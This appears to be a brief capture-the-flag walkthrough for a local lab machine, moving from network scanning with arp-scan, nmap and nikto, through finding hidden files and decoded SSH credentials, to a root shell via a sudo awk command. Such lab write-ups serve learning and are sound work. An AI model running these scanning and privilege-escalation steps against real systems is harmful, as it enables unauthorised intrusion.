Boot2User
At this stage, we will scan the network and find the ip address of the machine.
data:image/s3,"s3://crabby-images/b7e20/b7e206d4a2c717154962b503951c32644614a8d4" alt=""
arp-scan -l
As we see this is 192.168.2.102. Next we will see open ports.
data:image/s3,"s3://crabby-images/75f71/75f714566b039d14a535dfda84a5c51872590675" alt=""
nmap 192.168.2.102
Open ssh and apache, so let's check the web page.
data:image/s3,"s3://crabby-images/6566b/6566b4d4e1ff2234e1b069c3c3c1e1ef1edf8554" alt=""
Now let's find something interesting.
nikto -h 192.168.2.102 -p 80
data:image/s3,"s3://crabby-images/099d8/099d850b75d918aac21bd814ea61da9c570ae3bb" alt=""
In directory /img/ nikto found an interesting file called flaghost.png. After scanning the image through exiftool, I get a new directory names, in which I find the file "flag2.txt"
192.168.2.102/passw@45/
data:image/s3,"s3://crabby-images/8d3d6/8d3d60fe510dfa4770eba2874ccf0c882bbce774" alt=""
data:image/s3,"s3://crabby-images/5f6cc/5f6cce432cad1b8c887025eb690d55313adc53ab" alt=""
After decrypting a mysterious file that is encrypted with the Brainfuck cipher, I received data for ssh authorization.
web:Hacker@4514
data:image/s3,"s3://crabby-images/ef0ad/ef0ad1739a61977c645bb2973627da16cf973d72" alt=""
In home directory I found a flag.
data:image/s3,"s3://crabby-images/0070a/0070a0efa2ae53c3f0fd77d8146a4551efe8e733" alt=""
Boot2R00t
Using following command i see that I can run awk using root privileges.
data:image/s3,"s3://crabby-images/7d7ea/7d7ea6376e661c0913c3800995676f2b4e8da4e1" alt=""
sudo -l
Now i get root using awk.
data:image/s3,"s3://crabby-images/62afe/62afea20795a3cf49943b770f8abd6f3e7649bfe" alt=""
sudo /usr/bin/awk 'BEGIN {system("/bin/sh")}'
The all. Thanks Rahul Gehlaut for CTF.